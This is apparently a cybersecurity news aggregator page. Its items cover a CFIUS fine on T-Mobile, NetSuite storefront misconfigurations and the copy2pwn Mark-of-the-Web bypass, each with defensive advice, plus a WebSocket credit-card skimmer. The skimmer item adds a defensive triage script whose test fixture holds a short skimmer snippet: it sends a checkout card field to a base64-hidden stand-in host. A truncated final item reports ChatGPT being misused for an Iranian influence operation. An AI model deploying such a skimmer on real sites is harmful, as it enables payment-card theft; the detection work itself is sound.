Cyber security aggregate rss news

Cyber security aggregator - feeds history

T-Mobile Fined $60 M ...

Cybersecurity News

The Committee on Foreign Investment in the United States (CFIUS), the U.S. government body that reviews foreign investment in the country, has levied a $60 million fine on T-Mobile US, Inc. following a series of unauthorized data access incidents. The infractions occurred between August 2020 and June 2021 and violated a key provision of a national security agreement (NSA) that T-Mobile entered into as part of its 2020 merger with Sprint Corporation.

T-Mobile Breach of National Security Agreement

CFIUS approved the merger between T-Mobile and Sprint subject to that agreement, which was meant to mitigate potential national security risks. T-Mobile failed to adhere to it: it did not take adequate measures to prevent unauthorized access to sensitive data, and it did not report incidents in a timely manner. The agency concluded that the breaches harmed the national security interests of the United States, and the resulting $60 million penalty is the largest CFIUS has imposed to date. The statement on treasury.gov reads:

"CFIUS determined that between August 2020 and June 2021, in violation of a material provision of the NSA, T-Mobile failed to take appropriate measures to prevent unauthorized access to certain sensitive data and failed to report some incidents of unauthorized access promptly to CFIUS, delaying the Committee’s efforts to investigate and mitigate any potential harm. CFIUS concluded that these violations resulted in harm to the national security equities of the United States. T-Mobile has worked with CFIUS to enhance its compliance posture and obligations and has committed to working cooperatively with the U.S. Government to ensure compliance with its obligations going forward."

Increased Transparency and Enforcement Focus

Earlier this week, the U.S. Treasury Department, which chairs CFIUS, unveiled a new CFIUS enforcement website that gives the public and the investing community greater insight into the committee's compliance and enforcement efforts.

"In the last few years, CFIUS has redoubled its resources and focus on enforcement and accountability, and that is by design: if CFIUS requires companies to make certain commitments to protect national security and they fail to do so, there must be consequences," said Assistant Secretary of the Treasury for Investment Security Paul Rosen. "Today’s penalty updates underscore CFIUS’s commitment to accountability and the protection of national security."

The website update lists all the civil monetary penalties CFIUS has imposed over the past few years; the T-Mobile penalty is the largest and the only one disclosed by company name. CFIUS has issued three times more penalties in 2023 and 2024 than it had in its nearly 50-year history before that, underscoring its commitment to holding companies accountable.

Potential Data Expos ...

Cybersecurity News

Oracle's NetSuite, a popular Enterprise Resource Planning (ERP) platform, lets businesses deploy an external-facing store using SuiteCommerce or SiteBuilder, combining e-commerce operations and back-office processes (order processing, fulfillment, inventory management) in one platform. A recent investigation, however, has found that misconfigured access controls on custom record types (CRTs) can leave data behind SuiteCommerce sites readable by anyone on the internet.

Addressing Potential Risk in NetSuite's SuiteCommerce

According to Aaron Costello, Chief of SaaS Security Research at AppOmni, the issue could affect thousands of live public SuiteCommerce websites. He explains that the problem often arises when organizations deploying NetSuite are unaware that a default stock website has been publicly exposed, even if they never intended to set up an e-commerce store. (Image source: AppOmni)

"The most commonly exposed data appears to be personally identifiable information (PII) of registered customers, including full addresses and mobile phone numbers," Costello said.

This is not a security vulnerability in the NetSuite product itself. It is a misconfiguration: the exposure depends on how customers set the access controls within their own NetSuite environments. NetSuite protects record data with two layers of access control. Table-level access controls determine who can read a record type at all; field-level access controls determine who can read specific fields within it. When an unauthenticated visitor to a SuiteCommerce site requests records of a custom type, NetSuite consults those controls before answering. If the CRT's access type allows access without authentication, and its sensitive fields are not restricted at field level, the storefront returns the data to anyone who asks.

Mitigating the NetSuite Misconfiguration

To protect sensitive information, set table-level access on custom record types to "Require Custom Record Entries Permission" and set field-level access for public (unauthenticated) access to "None". The AppOmni team recommends that NetSuite administrators also take the following steps:

Review access controls on custom record types (CRTs): ensure the "Access Type" does not allow public access without authentication.

Restrict access to sensitive fields: even if table-level access is limited, review field-level permissions and set sensitive fields to "None" for unauthenticated users.

Consider temporarily taking impacted sites offline: as a stop-gap, take public-facing SuiteCommerce sites offline until the access controls are configured correctly.

Copy2Pwn Vulnerabili ...

Cybersecurity News

Security researchers recently uncovered a vulnerability, CVE-2024-38213, that allows threat actors to bypass Windows' Mark-of-the-Web (MotW) protections through copy-and-paste operations. The vulnerability, dubbed "copy2pwn", highlights the ongoing efforts of cybercriminals to exploit weaknesses in Windows security features and the value of proactive vulnerability research.

Threat of WebDAV Shares

Web-based Distributed Authoring and Versioning (WebDAV) is an extension to the Hypertext Transfer Protocol (HTTP) that adds file sharing and versioning. WebDAV shares can be opened in a web browser, but they can also be mounted as Windows Explorer paths, and files taken from a share that way did not always receive the MotW that a browser download would. (Image source: https://www.zerodayinitiative.com/blog/)

Threat actors have increasingly hosted malicious payloads on WebDAV shares, abusing vulnerabilities such as CVE-2024-36025 and CVE-2024-21412 to evade built-in Microsoft protections like Windows Defender SmartScreen. By crafting specific Windows search queries, attackers can control which files are displayed from the WebDAV share, disguising malicious files as harmless ones.

The Mark-of-the-Web is a crucial security feature in Windows: when a file is downloaded from the internet, Windows attaches an NTFS Alternate Data Stream (ADS), named Zone.Identifier, that records the zone the file came from. Its presence triggers additional security checks and prompts, reducing the risk of executing untrusted content. Other protective mechanisms, such as Windows Defender SmartScreen and Microsoft Office Protected View, key on the MotW; a file without it is opened as if it were local, and those safeguards never engage.

Researchers from the Zero Day Initiative (ZDI) Threat Hunting team observed the campaign as an update to an earlier one in which DarkGate operators exploited CVE-2024-21412 as a zero-day before researchers disclosed it to Microsoft.

Copy2Pwn Bypasses MotW Protections

Before Microsoft's June 2024 security update, files copied and pasted from WebDAV shares did not receive the MotW designation. A user could copy a file from a WebDAV share to their desktop and open it without the protections of Windows Defender SmartScreen or Microsoft Office Protected View. Researchers observed an increase in threat actors hosting payloads on WebDAV shares, and that activity led to the discovery of several vulnerabilities abused as zero-days, all clustered around retrieving malicious payloads from WebDAV shares. The researchers reported CVE-2024-38213 to Microsoft, which classified it as a "Windows Mark of the Web Security Feature Bypass Vulnerability" and patched it in June. To mitigate copy2pwn and related attacks such as clipboard hijacking and pastejacking, apply the June 2024 update, be cautious when accessing WebDAV shares, and remain vigilant when copying and pasting files from them.
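As an added example (not code from this page, from ZDI or from Microsoft), the following Python script shows what the Mark-of-the-Web actually is on disk and how a responder can triage a set of files for it: it parses the Zone.Identifier stream, classifies each file by zone, flags risky file types that lack an Internet-zone mark (which is exactly what a pre-fix copy-paste from a WebDAV share produced), and builds the stream text needed to put the mark back. On Windows it reads the stream straight from NTFS through the path:Zone.Identifier syntax; elsewhere it runs on the constructed SAMPLE_FILES list. The RISKY_EXTENSIONS set is this example's own assumption, not an official Microsoft list.

```python
"""Inspect the Mark-of-the-Web on files and rebuild it where it is missing.

Added example for this page; it is not code from ZDI or Microsoft. The
Zone.Identifier format ([ZoneTransfer] / ZoneId=N) is the one Windows writes;
the file list under SAMPLE_FILES is constructed for illustration.
"""
import os

STREAM_NAME = "Zone.Identifier"  # the NTFS alternate data stream that carries the MotW

ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# File types whose handlers consult the MotW (SmartScreen, Office Protected View, script hosts).
# Assumption: this list is the example's own, not an official Microsoft list.
RISKY_EXTENSIONS = {".exe", ".msi", ".js", ".vbs", ".hta", ".lnk", ".url",
                    ".docx", ".docm", ".xlsx", ".xlsm", ".pptx", ".pptm", ".zip", ".iso"}


def parse_zone_identifier(text):
    """Parse the ini-style stream. Returns a dict with an int ZoneId, or None if it is not a valid MotW stream."""
    if text is None:
        return None
    section, values = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip()] = value.strip()
    if not values.get("ZoneId", "").isdigit():
        return None
    values["ZoneId"] = int(values["ZoneId"])
    return values


def read_zone_identifier(path):
    """Read path:Zone.Identifier from NTFS. Returns None when the stream is absent or when not on Windows."""
    if os.name != "nt":
        return None
    try:
        with open(f"{path}:{STREAM_NAME}", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


def classify(path, stream_text):
    """Return (verdict, detail): MARKED (Internet/Restricted zone), LOW_ZONE, or UNMARKED."""
    info = parse_zone_identifier(stream_text)
    if info is None:
        return "UNMARKED", "no Zone.Identifier stream; SmartScreen and Protected View will not engage"
    zone = info["ZoneId"]
    name = ZONE_NAMES.get(zone, f"zone {zone}")
    if zone >= 3:
        return "MARKED", f"{name}; HostUrl={info.get('HostUrl', '?')}"
    return "LOW_ZONE", f"{name}; handlers treat the file as trusted"


def make_zone_identifier(zone_id=3, host_url=None, referrer_url=None):
    """Build stream text to re-apply the MotW, e.g. to a file that arrived by copy-paste from WebDAV.
    On Windows, write it with open(f"{path}:{STREAM_NAME}", "w")."""
    lines = ["[ZoneTransfer]", f"ZoneId={zone_id}"]
    if referrer_url:
        lines.append(f"ReferrerUrl={referrer_url}")
    if host_url:
        lines.append(f"HostUrl={host_url}")
    return "\r\n".join(lines) + "\r\n"


def audit(files):
    """files: iterable of (path, stream_text or None).
    Returns [(path, verdict, detail)] for risky file types that lack an Internet-zone MotW."""
    findings = []
    for path, text in files:
        if os.path.splitext(path)[1].lower() not in RISKY_EXTENSIONS:
            continue
        verdict, detail = classify(path, text)
        if verdict != "MARKED":
            findings.append((path, verdict, detail))
    return findings


# Constructed sample: what a review of a user's Downloads and Desktop might look like.
SAMPLE_FILES = [
    ("C:\\Users\\alice\\Downloads\\invoice.exe",  # browser download: marked Internet zone
     make_zone_identifier(3, host_url="https://files.example.test/invoice.exe")),
    ("C:\\Users\\alice\\Desktop\\report.hta", None),  # Ctrl-C/Ctrl-V from a WebDAV share, pre-fix: no stream
    ("C:\\Users\\alice\\Desktop\\notes.txt", None),   # no stream, but not a type whose handler cares
    ("C:\\Users\\alice\\Downloads\\tool.msi",         # marked, but as Local intranet: SmartScreen is lenient
     "[ZoneTransfer]\r\nZoneId=1\r\n"),
]

if __name__ == "__main__":
    import sys
    paths = sys.argv[1:]
    files = [(p, read_zone_identifier(p)) for p in paths] if paths else SAMPLE_FILES
    for path, verdict, detail in audit(files):
        print(f"{verdict:9} {path}  ({detail})")
```

Pass file paths as arguments on Windows to audit real files; with no arguments it runs over the constructed sample. A missing stream is also normal for files created locally, so an UNMARKED hit is a triage lead, not proof of a bypass; check where the file came from (mounted WebDAV paths look like \\host@SSL@443\DavWWWRoot\...) before acting. To restore the mark on Windows, write the text from make_zone_identifier() to the file's Zone.Identifier stream (PowerShell's Set-Content -Stream Zone.Identifier does the same), after which SmartScreen and Protected View engage again.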

Malware and Vulnerabilities

A recent investigation uncovered a credit card skimmer that uses a WebSocket connection to steal card details from an infected PrestaShop website. Attackers use WebSockets because the exfiltration blends in with legitimate real-time traffic and is harder to analyze than ordinary HTTP requests.
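As an added example (not code from the investigation summarised above), the following Python script does the static triage a responder would run on a suspect storefront: it pulls every ws:// or wss:// endpoint out of a page's source, including endpoints hidden inside base64 string literals that a plain grep for "wss://" would miss, and flags those that point to hosts the shop has no business talking to. The page source in SAMPLE_PAGE and the hosts in it are constructed.

```python
"""Static triage for WebSocket-based skimmers in storefront page source.

Added example for this page; it is not code from the investigation it
summarises. The page source in SAMPLE_PAGE is constructed: one legitimate
WebSocket on the shop host and one skimmer whose endpoint is hidden behind
atob() so that a grep for "wss://" finds nothing.
"""
import base64
import binascii
import re
from urllib.parse import urlsplit

WS_URL_RE = re.compile(r"wss?://[^\s'\"<>)]+")
# Any quoted JS string literal (handles \" escapes); used to locate base64 blobs.
STRING_LITERAL_RE = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")


def _decode_base64(token):
    """Decode a base64 literal to text, or None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_websocket_endpoints(source):
    """Return [(url, obfuscated)] for every ws:// or wss:// URL in the source,
    whether written in the clear or hidden inside a base64 string literal."""
    found, seen = [], set()

    def add(url, obfuscated):
        if url not in seen:
            seen.add(url)
            found.append((url, obfuscated))

    for m in WS_URL_RE.finditer(source):
        add(m.group(0), False)
    for m in STRING_LITERAL_RE.finditer(source):
        literal = m.group(2)
        if BASE64_RE.fullmatch(literal):
            decoded = _decode_base64(literal)
            if decoded:
                for url in WS_URL_RE.findall(decoded):
                    add(url, True)
    return found


def flag_offsite(endpoints, first_party_hosts):
    """Keep only endpoints whose host is not one the shop is expected to talk to.
    Returns [(url, host, obfuscated)]."""
    flagged = []
    for url, obfuscated in endpoints:
        host = (urlsplit(url).hostname or "").lower()
        if host not in first_party_hosts:
            flagged.append((url, host, obfuscated))
    return flagged


# Constructed checkout page: the shop is shop.example.test; the skimmer host is made up.
SAMPLE_PAGE = """
<script src="/themes/classic/assets/js/theme.js"></script>
<script>
  // legitimate live-chat widget served from the shop host
  var chat = new WebSocket("wss://shop.example.test/chat");
</script>
<script>
  // skimmer: endpoint decoded at runtime, card fields sent when checkout is submitted
  var _0x = atob("d3NzOi8vY2RuLXN0YXRzLmV4YW1wbGUubmV0L3dz");
  var s = new WebSocket(_0x);
  document.querySelector("#checkout").addEventListener("submit", function () {
    s.send(JSON.stringify({cc: document.querySelector("#cc").value}));
  });
</script>
"""

if __name__ == "__main__":
    hits = flag_offsite(find_websocket_endpoints(SAMPLE_PAGE), {"shop.example.test"})
    for url, host, obfuscated in hits:
        tag = " (base64-obfuscated)" if obfuscated else ""
        print(f"off-site WebSocket to {host}{tag}: {url}")
```

Run it over the rendered checkout page and the theme and module JavaScript it loads, with the shop's own hostnames as the allow-list. URLs built at runtime from split strings or fetched from a second stage evade any static scan, so pair this check with a Content-Security-Policy connect-src directive limited to the shop's own origin, which the browser enforces on WebSocket connections at runtime and which turns a hidden exfiltration channel into a visible CSP violation report.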

Feed

OpenAI on Friday said it banned a set of accounts linked to what it said was an Iranian covert influence operation that leveraged ChatGPT to generate content that, among other things, focused on the upcoming U.S. presidential election. "This week we identified and took down a cluster of ChatGPT accounts that were generating content for a covert Iranian influence operation identified as

Aggregator history: Saturday, August 17, 2024